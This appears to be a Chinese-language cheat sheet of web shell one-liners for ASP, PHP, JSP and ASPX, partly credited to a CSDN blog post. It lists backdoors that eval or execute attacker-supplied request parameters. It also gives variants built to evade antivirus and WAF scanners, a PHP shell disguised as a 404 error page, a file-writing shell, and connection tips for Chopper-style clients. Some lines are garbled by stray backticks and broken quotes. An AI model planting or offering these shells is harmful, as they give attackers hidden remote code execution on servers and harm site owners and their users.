<script language="php">system($_GET['xxx']);</script>
<%eval request("c")%>
<%execute request("c")%>
<%execute(request("c"))%>
<%ExecuteGlobal request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<%                                 %>
'备份专用
<%eval(request("c")):response.end%>
'无防下载表,有防下载表突破专用一句话
<%execute request("c")%><%<%loop<%:%>
<%<%loop<%:%><%execute request("c")%>
<%execute request("c")<%loop<%:%>
'防杀防扫专用
<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>
'不用"<,>"

<script language=VBScript runat=server>execute request("c")</script>

<% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx.
名字)+'') %>

<script language=vbs runat=server>eval(request("c"))</script>
<script language=vbs runat=server>eval_r(request("c"))</script>

'不用双引号
<%eval request(chr(35))%>
'可以躲过雷客图
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>
<%dy=request("dy")%><%Eval(dy)%>
'容错代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
PHP一句话

<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容错代码
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//绕过<?限制的一句话

<script language="php">@eval_r($_POST[sb])</script>

//绕过<?php ?>限制的一句话 

<?=eval($_POST['cmd']);

JSP一句话

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>
提交客户端

<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>

ASPX一句话

<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>

普通的php一句话：<?php @eval($_POST['r00ts']);?>
普通的asp一句话：<%                                         %>
aspx突破一流的：
dim da
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write "yes"
else
Response.Write "no"
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write "<form action=" method=post>"
Response.Write "<input type=text name=path>"
Response.Write "<br>"
Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))
Response.Write "<br>"
Response.Write "操作系统为:"&Request.ServerVariables("OS")
Response.Write "<br>"
Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")
Response.Write "<br>"
Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"
Response.Write "<br>"
Response.Write "<input type=submit value=save>"
Response.Write "</form>"
</Script>


ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

PHP防杀放扫 一句话：<?php (])?>
上面这句是防杀防扫的！网上很少人用！可以插在网页任何ASP文件的最底部不会出错，比如
index.asp里面也是可以的！

因为加了判断！加了判断的PHP一句话，与上面的ASP一句话相同道理，也是可以插在任何PHP文件
的最底部不会出错！<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system($_REQUEST[1]);?>

无防下载表，有防下载表可尝试插入以下语句突破的一句话
<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request(“class”)%><%execute request(“class”)'<% loop <%:%>


备份专用<%eval(request(“1″)):response.end%>
asp一句话<%execute(request(“1″))%>
aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y(“add6bb58e139be10″);</script>

可以躲过雷客图的一句话。
<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,
requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

不用'<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script>

不用双引号的一句话。<%eval request(chr(35))%>

版权声明：本文为CSDN博主「冰河」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/l1028386804/article/details/84206143

常见的一句话木马

1、普通一句话：

1	<?php @eval($_POST[123456]);?>

*post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码

2、防爆破一句话：

1	<?php``substr(md5($_REQUEST[``'x'``]),28)==``'6862'``&&``eval``($_REQUEST[``'password'``]);``?>``*菜刀地址http:``//192``.168.64.137``/x``.php?x=myh0st

3、过狗一句话:

1	<?php ?> ``//``菜刀地址 http:``//localhost/1``.php?s=assert``<php $a = ``"a"``.``"s"``.``"s"``.``"e"``.``"r"``.``"t"``; $a($_POST[hihack]);``?>

4、404隐藏的一句话：

<!DOCTYPE HTML PUBLIC ``"-//IETF//DTD HTML 2.0//EN"``>``<html><``head``>``<title>404 Not Found<``/title``>``<``/head``><body>``<h1>Not Found<``/h1``>``<p>The requested URL ``/error``.php was not found on this server. <``/p``>``<``/body``><``/html``>``<?php``@preg_replace(``"/[checksql]/e"``,$_POST[``'hihack'``],``"saft"``);``?>

菜刀连接时在配置栏添加：

1	<O>``date``=@``eval``($_POST[paxmac]);<``/O``>

5、不用问号(?)的一句话：

1	<script language=``"php"``> </script>

5、不用双引号(“)的一句话：

1	<%``eval` `request(chr(35))%> 密码：``#

ASPX一句话：

1、普通一句话：

1	<%@ Page Language=”Jscript”%> <% %>